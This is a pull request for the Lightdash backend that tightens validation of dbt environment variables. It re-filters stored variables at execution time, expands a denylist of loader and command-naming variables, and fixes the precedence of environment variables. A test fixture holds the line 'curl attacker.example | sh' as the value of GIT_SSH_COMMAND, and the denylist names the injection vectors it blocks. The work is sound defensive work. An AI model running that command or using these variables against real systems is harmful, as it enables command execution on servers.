### PR TITLE
fix(dbt): stricter env var validation for dbt projects

### DIFF
--- a/packages/backend/src/dbt/dbtCliClient.ts
+++ b/packages/backend/src/dbt/dbtCliClient.ts
@@ -187,10 +187,10 @@ export class DbtCliClient implements DbtClient {
                 all: true,
                 stdio: ['pipe', 'pipe', process.stderr],
                 env: {
+                    ...this.environment,
                     DBT_PARTIAL_PARSE: 'false', // Disable dbt from storing manifest and doing partial parses. https://docs.getdbt.com/reference/parsing#partial-parsing
                     DBT_SEND_ANONYMOUS_USAGE_STATS: 'false', // Disable sending usage stats. https://docs.getdbt.com/reference/global-configs/usage-stats
                     DBT_TARGET_PATH: targetPath,
-                    ...this.environment,
                 },
             });
             return {

--- a/packages/backend/src/projectAdapters/dbtLocalCredentialsProjectAdapter.ts
+++ b/packages/backend/src/projectAdapters/dbtLocalCredentialsProjectAdapter.ts
@@ -1,4 +1,5 @@
 import {
+    buildSafeDbtEnvironmentVariables,
     CreateWarehouseCredentials,
     DbtProjectEnvironmentVariable,
     SupportedDbtVersions,
@@ -61,15 +62,17 @@ export class DbtLocalCredentialsProjectAdapter extends DbtLocalProjectAdapter {
             });
         }
         writeFileSync(profilesFilename, profile);
-        const e = (environment || []).reduce<Record<string, string>>(
-            (previousValue, { key, value }) => ({
-                ...previousValue,
-                ...(key.length > 0 ? { [key]: value } : {}), // ignore empty strings
-            }),
-            {},
-        );
+        const { environment: safeEnvironment, blockedKeys } =
+            buildSafeDbtEnvironmentVariables(environment);
+        if (blockedKeys.length > 0) {
+            Logger.warn(
+                `Ignoring unsafe dbt environment variables: ${blockedKeys.join(
+                    ', ',
+                )}`,
+            );
+        }
         const updatedEnvironment = {
-            ...e,
+            ...safeEnvironment,
             ...injectedEnvironment,
         };
         super({

--- a/packages/common/src/index.ts
+++ b/packages/common/src/index.ts
@@ -171,6 +171,7 @@ export * from './types/projectMemberRole';
 export {
     AthenaAuthenticationType,
     BigqueryAuthenticationType,
+    buildSafeDbtEnvironmentVariables,
     DatabricksAuthenticationType,
     DBT_VERSION_SUPPORTED_WAREHOUSES,
     DbtProjectType,
@@ -279,6 +280,7 @@ export type {
     ProjectDbtSourceWithConnection,
     ProjectSummary,
     RedshiftCredentials,
+    SafeDbtEnvironmentVariables,
     SensitiveCredentialsFieldNames,
     SnowflakeCredentials,
     SshTunnelConfiguration,

--- a/packages/common/src/types/projects.test.ts
+++ b/packages/common/src/types/projects.test.ts
@@ -1,4 +1,5 @@
 import {
+    buildSafeDbtEnvironmentVariables,
     DbtVersionOptionLatest,
     getDbtEnvironmentVariableKeyError,
     getDbtVersionSupportedWarehouses,
@@ -40,6 +41,32 @@ describe('dbt environment variable validation', () => {
         );
     });
 
+    test('blocks variables that relocate where dbt, python or git read code and config from', () => {
+        [
+            'HOME',
+            'PYTHONUSERBASE',
+            'PYTHONSTARTUP',
+            'PYTHONWARNINGS',
+            'GIT_EXTERNAL_DIFF',
+            'GIT_PROXY_COMMAND',
+            'GIT_CONFIG_GLOBAL',
+            'SSH_AUTH_SOCK',
+            'BASH_ENV',
+            'BASH_FUNC_deploy',
+            'GCONV_PATH',
+            'NODE_OPTIONS',
+            'DBT_TARGET_PATH',
+            'DBT_PROFILES_DIR',
+            'TMPDIR',
+            'XDG_CONFIG_HOME',
+            'PIP_INDEX_URL',
+        ].forEach((key) => {
+            expect(getDbtEnvironmentVariableKeyError(key)).toContain(
+                'cannot be used',
+            );
+        });
+    });
+
     test('reserves Lightdash profile variables for internal use', () => {
         const key = `${LIGHTDASH_DBT_PROFILE_ENV_VAR_PREFIX}PASSWORD`;
 
@@ -61,6 +88,28 @@ describe('dbt environment variable validation', () => {
                 { key: 'PYTHONPATH', value: '/tmp' },
             ]),
         ).toEqual(['GIT_SSH_COMMAND', 'PYTHONPATH']);
+    });
+
+    test('drops unsafe keys stored before validation existed', () => {
+        expect(
+            buildSafeDbtEnvironmentVariables([
+                { key: 'ENV', value: 'production' },
+                { key: '', value: 'ignored' },
+                { key: 'GIT_SSH_COMMAND', value: 'curl attacker.example | sh' },
+                { key: 'PYTHONUSERBASE', value: '/tmp/payload' },
+            ]),
+        ).toEqual({
+            environment: { ENV: 'production' },
+            blockedKeys: ['GIT_SSH_COMMAND', 'PYTHONUSERBASE'],
+        });
+    });
+
+    test('keeps Lightdash profile variables out of project environment', () => {
+        const key = `${LIGHTDASH_DBT_PROFILE_ENV_VAR_PREFIX}PASSWORD`;
+
+        expect(
+            buildSafeDbtEnvironmentVariables([{ key, value: 'stolen' }]),
+        ).toEqual({ environment: {}, blockedKeys: [key] });
     });
 });
 

--- a/packages/common/src/types/projects.ts
+++ b/packages/common/src/types/projects.ts
@@ -690,25 +690,53 @@ export const LIGHTDASH_DBT_PROFILE_ENV_VAR_PREFIX =
 
 const DBT_ENVIRONMENT_VARIABLE_KEY_REGEX = /^[A-Za-z_][A-Za-z0-9_]*$/;
 
+// Keys that load code into an interpreter or linker, name a program to run, or
+// relocate where dbt and git read code and config from.
 const BLOCKED_DBT_ENVIRONMENT_VARIABLE_KEYS = new Set([
-    'GIT_ASKPASS',
-    'GIT_SSH',
-    'GIT_SSH_COMMAND',
+    'BASH_ENV',
+    'BROWSER',
+    'CLASSPATH',
+    'DBT_PACKAGES_INSTALL_PATH',
+    'DBT_PROFILES_DIR',
+    'DBT_PROJECT_DIR',
+    'DBT_TARGET_PATH',
+    'EDITOR',
+    'GCONV_PATH',
+    'HOME',
+    'IFS',
+    'JAVA_TOOL_OPTIONS',
+    'JDK_JAVA_OPTIONS',
+    '_JAVA_OPTIONS',
     'LD_AUDIT',
     'LD_LIBRARY_PATH',
     'LD_PRELOAD',
-    'NODE_OPTIONS',
-    'NODE_PATH',
+    'LOCPATH',
+    'PAGER',
     'PATH',
+    'PERL5LIB',
     'PERL5OPT',
-    'PYTHONHOME',
-    'PYTHONPATH',
+    'PERLLIB',
+    'RUBYLIB',
     'RUBYOPT',
     'SHELL',
-    'SSH_ASKPASS',
+    'SHELLOPTS',
+    'TEMP',
+    'TMP',
+    'TMPDIR',
+    'VIRTUAL_ENV',
+    'VISUAL',
 ]);
 
-const BLOCKED_DBT_ENVIRONMENT_VARIABLE_KEY_PREFIXES = ['DYLD_', 'GIT_CONFIG_'];
+const BLOCKED_DBT_ENVIRONMENT_VARIABLE_KEY_PREFIXES = [
+    'BASH_FUNC_',
+    'DYLD_',
+    'GIT_',
+    'NODE_',
+    'PIP_',
+    'PYTHON',
+    'SSH_',
+    'XDG_', // git reads $XDG_CONFIG_HOME/git/config, which can name a pager, editor or ssh command
+];
 
 export const getDbtEnvironmentVariableKeyError = (
     key: string,
@@ -756,6 +784,33 @@ export const getInvalidDbtEnvironmentVariableKeys = (
     (environment ?? [])
         .map(({ key }) => key)
         .filter((key) => getDbtEnvironmentVariableKeyError(key) !== undefined);
+
+export type SafeDbtEnvironmentVariables = {
+    environment: Record<string, string>;
+    blockedKeys: string[];
+};
+
+// Re-applies the write-time rules at execution time, since stored config can
+// predate a key being blocked.
+export const buildSafeDbtEnvironmentVariables = (
+    environment: DbtProjectEnvironmentVariable[] | undefined,
+): SafeDbtEnvironmentVariables => {
+    const safeEnvironment: Record<string, string> = {};
+    const blockedKeys: string[] = [];
+
+    (environment ?? []).forEach(({ key, value }) => {
+        if (key.length === 0) {
+            return;
+        }
+        if (isSafeDbtEnvironmentVariableKey(key)) {
+            safeEnvironment[key] = value;
+        } else {
+            blockedKeys.push(key);
+        }
+    });
+
+    return { environment: safeEnvironment, blockedKeys };
+};
 
 export enum SupportedDbtVersions {
     V1_4 = 'v1.4',


### PR DESCRIPTION
## What & why

Project dbt environment variables were validated only at project create/update. Any row stored before a key was added to the denylist — and any write path that skips `validateDbtEnvironmentVariables` — still reached the `dbt` child process unfiltered, so a project setting could change how dbt or the processes it spawns execute (command execution on the server that runs dbt).

## Changes

- **Enforce the denylist at compile time, not just write time.** `buildSafeDbtEnvironmentVariables` (`packages/common/src/types/projects.ts`) drops unsafe keys and returns which were dropped; `DbtLocalCredentialsProjectAdapter` calls it when building the dbt process environment and logs the blocked keys. This is the single chokepoint every git/local adapter passes through, so legacy stored config can no longer execute.
- **Expand the denylist** to interpreter/linker loaders, program-naming vars, and config-relocation vars reachable by dbt's Python process and by the `git` subprocess `dbt deps` spawns — added prefixes `GIT_`, `PYTHON`, `PIP_`, `XDG_`, `NODE_`, `SSH_`, `BASH_FUNC_`, and keys like `HOME`, `BASH_ENV`, `GCONV_PATH`, `DBT_TARGET_PATH`. `ENV` stays allowed (documented customer value, covered by an existing test).
- **Fix env precedence in the execa call** (`dbtCliClient.ts`) so Lightdash-controlled `DBT_*` vars win over project vars — a project can no longer override `DBT_TARGET_PATH` and break per-compile target isolation.

## Testing

- `pnpm -F common test` — new cases cover the expanded denylist and the exec-time filter (legacy `GIT_SSH_COMMAND` row keeps its safe keys, loses the unsafe one; Lightdash profile vars can't be injected).
- `common` + `backend` typecheck and lint clean; full backend unit suite green.

Closes: PROD-9473
